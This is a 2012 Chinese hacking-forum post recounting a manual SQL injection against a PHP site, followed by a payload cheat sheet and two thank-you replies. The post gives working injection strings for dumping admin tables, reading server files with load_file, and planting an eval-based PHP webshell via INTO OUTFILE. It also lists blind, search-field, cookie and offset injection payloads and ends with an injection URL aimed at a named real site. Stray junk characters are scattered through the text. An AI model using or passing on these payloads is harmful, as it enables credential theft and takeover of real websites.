找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2917|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
7 b2 R8 b9 a2 p让我看看,既然人家开口了,我也不好拒绝,那就看看吧?8 ]  i1 D3 b) U  c
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
9 Q& `$ a/ X. d' j  a+ v. P如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
; H- X. s4 w' r5 K: v1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)' A; j- @; G7 S( y0 G, A
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
, _/ E7 {* H9 R$ l4 X, L9 F7 B  s, mWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in4 Q) D9 Q4 l/ G! r, ^& _# q
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入3 C7 h6 R) l& ]7 l; c9 j. i" L7 l
                         * x# H7 ^6 T- N) A7 m6 ?
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,: S9 V' y. V! Y3 L, f) q4 Z
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意6 P5 c9 z, Z/ @* @& ~* I1 D* r
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
  {4 D9 x8 X3 t' C% t5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。5 _  E* Z" n0 T5 u8 B+ Z$ `
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
7 b9 a' n' u$ ?5 c5 T2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
  n) J( o1 o% p: Q我就用的是第二个思路,
1 J  ?$ H  e/ `9 B& M' U4 D提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  8 Y9 y2 b; @, c' Z2 d8 }+ |
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
. a: A, ^; J8 x  y提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--' q" f" b- t' `4 C5 o# E
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
) s( S0 b4 I9 E* [: x- v3 ~7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
5 R( u* [+ Q* }, f- ]是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
, G' }  H( P; T& d' x5 v提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --$ }) \( k, \' O7 T0 \/ @
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,% x1 s" J- p9 N, v# e
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......' U( m* r8 P, t4 `7 h. n; Y
下面是一些很普遍注入方式资料:
6 O. ~+ b( [  M) ?2 t7 u注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
5 [/ F% A) g+ K- ?7 Q+ Z# P, ^5 B0 w; E拆半法
( Y. v$ k, n7 o, t$ R######################################) C6 h7 G; N3 E: u; V* u5 y
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。, i( j' {5 Z9 q1 B  u9 C, ?% R! o
and exists (select * from admin)
) l( O9 P8 Q& H% ?4 |and exists(select id from admin)
+ J6 p* }& T; _- b0 e* T. k! F# Gand exists(select id from admin where id=1)
3 _0 _7 y; M; e4 Z: Pand exists(select id from admin where id>1) 1 H1 _* y4 Q, C/ m- b( Z$ G# J
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
1 w; Q/ r$ J! [+ \" g  pand exists (select username from admin)
# {) V; \1 v6 J6 i9 ]9 i: Pand exists (select password from admin)1 Q8 F- z; _. x& b- q
and exists (select id from admin where len(username)<10 and id=1)
' F3 W; }8 s1 F' q7 V* R' band exists (select id from admin where len(username)>5 and id=1)
' j9 N; O* D- n1 E3 q$ @and exists (select id from admin where len(username)=6 and id=1)( Q  _$ f9 A% B' @! h
and exists (select id from admin where len(password)<10 and id=1)
$ h. o: H6 G0 B! l8 nand exists (select id from admin where len(password)>5 and id=1)- `% k3 s" K) R! g; C
and exists (select id from admin where len(password)=7 and id=1)
4 M0 Q' l) Z7 Z5 n! Q/ Mand (select top 1 asc(mid(username,1,1)) from admin)=97
4 {/ m0 T3 E+ h, l  k  l0 ?5 H1 a返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
7 j2 Z; d2 i: O( N2 d" V猜第二位把username,1,1改成username,2,1就可以了。
0 _; u& I; ~4 {& f8 V( k猜密码把username改成password就OK了: T8 Z4 P/ K, M/ d
##################################################: K' K2 l/ A" c6 G8 K5 s) @' R
搜索型注入- _$ m6 N$ I6 j0 j0 X
##################################* I8 Y( X/ A; s5 q5 O; _7 ]
%' and 1=1 and '%'='
, ]* X! P; v5 s) v4 t. Y%' and exists (select * from admin) and '%'='
9 x3 f" u; ^9 _( |1 X6 O5 j5 q%' and exists(select id from admin where id=1) and '%'='! K7 W! u, b1 v$ i* h& S5 F9 s6 X$ ?
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
6 q- P4 _$ y7 ^1 A9 O; M2 k%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
2 @5 R' ^1 U6 h%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
0 W/ t* C- u/ X/ m9 ]5 z$ c+ J这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
! u8 ]. q; X& w8 C4 A/ P  M对于MSSQL数据库,后面可以吧 and '%'='换成--$ g+ m: t% \/ l) a/ Y
还有一点搜索型注入也可以使用union语句。
8 t8 H" b1 T& _. B' V- G8 H$ X########################################################5 A6 [8 O- U) |& f4 d) U8 H
联合查询。# d9 J, k) T& V
#####################################
% P- ?9 ?; Y' i( s2 P5 Korder by 104 x5 k0 r' E' _7 N4 ?4 o5 s2 }
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
' C/ H# R' X: m% S! l8 Uand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
, |; O. T$ U! l/ Nand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
. j7 x2 d' ?" U" K: d# h很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
$ ]# \. @* F8 Q5 `' J###################################$ J: Z5 t5 r# w- b
cookie注入( ]" V. m& ~4 r  N
###############################
/ W/ U+ ]8 U6 y' b) ihttp://www.******.com/shownews.asp?id=127* K; T- {8 }; u
http://www.******.com/shownews.asp
8 V) ]8 g. t, b2 K# p3 D0 Kalert(="id="+escape("127"));
, H- I8 \9 ]6 \9 k; M$ Nalert(="id="+escape("127 and 1=1"));& T8 T9 N1 G6 ~0 o
alert(="id="+escape("127 order by 10"));
' z3 J$ `; m2 R5 valert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));0 w3 @& G" q1 _6 H8 F+ ?$ {
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));8 y7 ]/ ]" V7 _5 y6 {, p' ~! l; V
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
" \8 Y2 b6 f' h& e( j###################################/ |- g( j5 g3 p  [
偏移注入. G7 ~( s) N7 F; u
###########################################################
9 ]  K5 |' Z9 j0 J( `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
' r# m( m, d" T7 Junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
9 Z+ W$ ~; s6 k% K- iunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
: t5 F+ r1 U) punion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
8 T" I' n) T4 @$ T. T: X+ qunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
" i( T/ K  H0 E3 [union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
" G1 k9 V: q9 x1 t! J1 X  z* }union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on, g* c/ Z8 s% T1 A* [# B' E
a.id=d.id)
' _1 x/ d" v2 L' O- Rand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)# J$ a8 n- }# W( h. r& x& J5 G4 X  n
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
* E( S2 Z! K5 _' h5 J  ?! k) I  5 p5 M2 ^! P9 m: H- E9 L
============================================================================================================
4 S5 g+ f7 X) S8 P9 b7 I3 ]: T. d1.判断版本
: q, l+ {7 _- t1 S' P! z% \and ord(mid(version(),1,1))>514 ?1 g# f* T3 D* k( G& ]  N" c
返回正常,说明大于4.0版本,支持ounion查询7 `9 i; V' x# S2 A2 ~
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解: g+ E& e0 A5 I/ Z3 y" R
and 2=4 union select 1,2,3,4,5,6,7,8,9--
0 Q, o7 L$ u8 g# k( H3.查看数据库版本及当前用户,
: l+ `& d9 q* L5 Yand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
* ^% T8 q3 e5 ]数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,8 G/ N% z1 }8 b7 X4 o! ~
4.判断有没有写权限
3 ?& `3 q) e: b$ {1 i, tand (select count(*) from MySQL.user)>0-- ( P8 n% H! E3 H7 l" q$ S% @" B9 d
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1( Y# u# k6 I! \9 ^
用不了这个命令,就学习土耳其黑客手法,如下
+ n' `; Y9 a3 P/ c4 [and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--4 Q% }9 R' B+ d5 `- U+ d
6.爆表,爆库, E! C/ p: P' i( z: F8 c* g
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--0 p, b2 u& c3 A6 Y
7.爆列名,爆表
( Q0 o8 g% A) Iand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--  u4 P) v/ O5 b" N+ a7 {3 g# _
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
. |; H; b& N+ X& Zand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
+ c3 S0 L' g1 f+ `( o9.爆字段内容
' L& b4 X2 X3 e! q& P! n4 ]# k. P6 band+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--( ]! K: Q9 l4 `1 i
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表